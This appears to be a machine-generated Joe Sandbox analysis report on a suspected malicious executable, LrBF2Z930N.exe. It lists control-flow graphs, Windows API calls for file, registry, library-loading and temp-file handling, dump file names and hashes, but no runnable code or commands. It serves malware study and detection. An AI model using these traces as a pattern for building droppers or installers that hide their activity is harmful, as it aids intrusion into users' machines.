                                                                                      control_flow_graph 487 4026f1-40270a call 402d89 490 402710-402717 487->490 491 402c2f-402c32 487->491 492 402719 490->492 493 40271c-40271f 490->493 494 402c38-402c3e 491->494 492->493 496 402883-40288b 493->496 497 402725-402734 call 4065e2 493->497 496->491 497->496 500 40273a 497->500 501 402740-402744 500->501 502 4027d9-4027dc 501->502 503 40274a-402765 ReadFile 501->503 504 4027f4-402804 call 4061f5 502->504 505 4027de-4027e1 502->505 503->496 506 40276b-402770 503->506 504->496 514 402806 504->514 505->504 507 4027e3-4027ee call 406253 505->507 506->496 509 402776-402784 506->509 507->496 507->504 510 40278a-40279c MultiByteToWideChar 509->510 511 40283f-40284b call 4065c9 509->511 510->514 515 40279e-4027a1 510->515 511->494 520 402809-40280c 514->520 518 4027a3-4027ae 515->518 518->520 521 4027b0-4027d5 SetFilePointer MultiByteToWideChar 518->521 520->511 522 40280e-402813 520->522 521->518 525 4027d7 521->525 523 402850-402854 522->523 524 402815-40281a 522->524 527 402871-40287d SetFilePointer 523->527 528 402856-40285a 523->528 524->523 526 40281c-40282f 524->526 525->514 526->496 529 402831-402837 526->529 527->496 530 402862-40286f 528->530 531 40285c-402860 528->531 529->501 532 40283d 529->532 530->496 531->527 531->530 532->496
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402798
                                                                                      • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027BB
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027D1
                                                                                        • Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406269
                                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040287D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      • API String ID: 163830602-2366072709
                                                                                      • Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                                                      • Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
                                                                                      • Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                                                      • Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 533 406a06-406a26 GetSystemDirectoryW 534 406a28 533->534 535 406a2a-406a2c 533->535 534->535 536 406a3d-406a3f 535->536 537 406a2e-406a37 535->537 539 406a40-406a73 wsprintfW LoadLibraryExW 536->539 537->536 538 406a39-406a3b 537->538 538->539
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                                                      • wsprintfW.USER32 ref: 00406A58
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME
                                                                                      • API String ID: 2200240437-1106614640
                                                                                      • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                      • Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
                                                                                      • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                      • Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 540 402eae-402ed7 call 4064ef 542 402edc-402ee0 540->542 543 402f91-402f95 542->543 544 402ee6-402eea 542->544 545 402eec-402f0d RegEnumValueW 544->545 546 402f0f-402f22 544->546 545->546 547 402f76-402f84 RegCloseKey 545->547 548 402f4b-402f52 RegEnumKeyW 546->548 547->543 549 402f24-402f26 548->549 550 402f54-402f66 RegCloseKey call 406a76 548->550 549->547 551 402f28-402f3c call 402eae 549->551 556 402f86-402f8c 550->556 557 402f68-402f74 RegDeleteKeyW 550->557 551->550 558 402f3e-402f4a 551->558 556->543 557->543 558->548
                                                                                      APIs
                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseEnum$DeleteValue
                                                                                      • String ID:
                                                                                      • API String ID: 1354259210-0
                                                                                      • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                                      • Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
                                                                                      • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                                      • Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 559 6e391817-6e391856 call 6e391bff 563 6e39185c-6e391860 559->563 564 6e391976-6e391978 559->564 565 6e391869-6e391876 call 6e392480 563->565 566 6e391862-6e391868 call 6e39243e 563->566 571 6e391878-6e39187d 565->571 572 6e3918a6-6e3918ad 565->572 566->565 575 6e391898-6e39189b 571->575 576 6e39187f-6e391880 571->576 573 6e3918cd-6e3918d1 572->573 574 6e3918af-6e3918cb call 6e392655 call 6e391654 call 6e391312 GlobalFree 572->574 577 6e39191e-6e391924 call 6e392655 573->577 578 6e3918d3-6e39191c call 6e391666 call 6e392655 573->578 600 6e391925-6e391929 574->600 575->572 579 6e39189d-6e39189e call 6e392e23 575->579 581 6e391888-6e391889 call 6e392b98 576->581 582 6e391882-6e391883 576->582 577->600 578->600 594 6e3918a3 579->594 591 6e39188e 581->591 583 6e391890-6e391896 call 6e392810 582->583 584 6e391885-6e391886 582->584 599 6e3918a5 583->599 584->572 584->581 591->594 594->599 599->572 603 6e39192b-6e391939 call 6e392618 600->603 604 6e391966-6e39196d 600->604 609 6e39193b-6e39193e 603->609 610 6e391951-6e391958 603->610 604->564 606 6e39196f-6e391970 GlobalFree 604->606 606->564 609->610 611 6e391940-6e391948 609->611 610->604 612 6e39195a-6e391965 call 6e3915dd 610->612 611->610 613 6e39194a-6e39194b FreeLibrary 611->613 612->604 613->610
                                                                                      APIs
                                                                                        • Part of subcall function 6E391BFF: GlobalFree.KERNEL32(?), ref: 6E391E74
                                                                                        • Part of subcall function 6E391BFF: GlobalFree.KERNEL32(?), ref: 6E391E79
                                                                                        • Part of subcall function 6E391BFF: GlobalFree.KERNEL32(?), ref: 6E391E7E
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6E3918C5
                                                                                      • FreeLibrary.KERNEL32(?), ref: 6E39194B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6E391970
                                                                                        • Part of subcall function 6E39243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6E39246F
                                                                                        • Part of subcall function 6E392810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E391896,00000000), ref: 6E3928E0
                                                                                        • Part of subcall function 6E391666: wsprintfW.USER32 ref: 6E391694
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3424771390.000000006E391000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E390000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3422340994.000000006E390000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429717707.000000006E394000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429758599.000000006E396000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6e390000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3962662361-3916222277
                                                                                      • Opcode ID: 283944f80440090b3ebe45930f88663976a09c79a742a1049ae94a02d18af52b
                                                                                      • Instruction ID: c6e69580ded024aba9db5f21f6ad901ca30d4ea9ead27b35e5fe2266354f0051
                                                                                      • Opcode Fuzzy Hash: 283944f80440090b3ebe45930f88663976a09c79a742a1049ae94a02d18af52b
                                                                                      • Instruction Fuzzy Hash: 9141D6718046019BDF409FE4D984BD537ACBF05358F1648A5ED55BA18AFB79808CF7B0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 616 401c48-401c68 call 402d89 * 2 621 401c74-401c78 616->621 622 401c6a-401c71 call 402dab 616->622 623 401c84-401c8a 621->623 624 401c7a-401c81 call 402dab 621->624 622->621 627 401cd8-401d02 call 402dab * 2 FindWindowExW 623->627 628 401c8c-401ca8 call 402d89 * 2 623->628 624->623 639 401d08 627->639 640 401cc8-401cd6 SendMessageW 628->640 641 401caa-401cc6 SendMessageTimeoutW 628->641 642 401d0b-401d0e 639->642 640->639 641->642 643 401d14 642->643 644 402c2f-402c3e 642->644 643->644
                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                                                      • Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
                                                                                      • Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                                                      • Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 647 40248f-4024b6 call 402dab * 2 call 402e3b 653 4024bb-4024c0 647->653 654 4024c6-4024d0 653->654 655 402c2f-402c3e 653->655 656 4024d2-4024df call 402dab lstrlenW 654->656 657 4024e3-4024e6 654->657 656->657 661 4024e8-4024f9 call 402d89 657->661 662 4024fa-4024fd 657->662 661->662 664 40250e-402522 RegSetValueExW 662->664 665 4024ff-402509 call 403376 662->665 669 402524 664->669 670 402527-402608 RegCloseKey 664->670 665->664 669->670 670->655
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsk82C6.tmp
                                                                                      • API String ID: 2655323295-487429065
                                                                                      • Opcode ID: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                                                      • Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
                                                                                      • Opcode Fuzzy Hash: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                                                      • Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 672 4061a1-4061ad 673 4061ae-4061e2 GetTickCount GetTempFileNameW 672->673 674 4061f1-4061f3 673->674 675 4061e4-4061e6 673->675 676 4061eb-4061ee 674->676 675->673 677 4061e8 675->677 677->676
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 004061BF
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-44229769
                                                                                      • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                      • Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
                                                                                      • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                      • Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 761 4015c6-4015da call 402dab call 405ffc 766 401636-401639 761->766 767 4015dc-4015ef call 405f7e 761->767 769 401668-4022fb call 401423 766->769 770 40163b-40165a call 401423 call 406682 SetCurrentDirectoryW 766->770 774 4015f1-4015f4 767->774 775 401609-40160c call 405c30 767->775 785 402c2f-402c3e 769->785 770->785 789 401660-401663 770->789 774->775 779 4015f6-4015fd call 405c4d 774->779 782 401611-401613 775->782 779->775 794 4015ff-401602 call 405bd6 779->794 786 401615-40161a 782->786 787 40162c-401634 782->787 792 401629 786->792 793 40161c-401627 GetFileAttributesW 786->793 787->766 787->767 789->785 792->787 793->787 793->792 796 401607 794->796 796->782
                                                                                      APIs
                                                                                        • Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\LrBF2Z930N.exe"), ref: 0040600A
                                                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                        • Part of subcall function 00405BD6: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,00000000,000000F0), ref: 00401652
                                                                                      Strings
                                                                                      • C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID: C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet
                                                                                      • API String ID: 1892508949-3948318427
                                                                                      • Opcode ID: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
                                                                                      • Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
                                                                                      • Opcode Fuzzy Hash: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
                                                                                      • Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                                                      • Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
                                                                                      • Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                                                      • Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                                                      • Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
                                                                                      • Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                                                      • Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45
                                                                                      Memory Dump Source
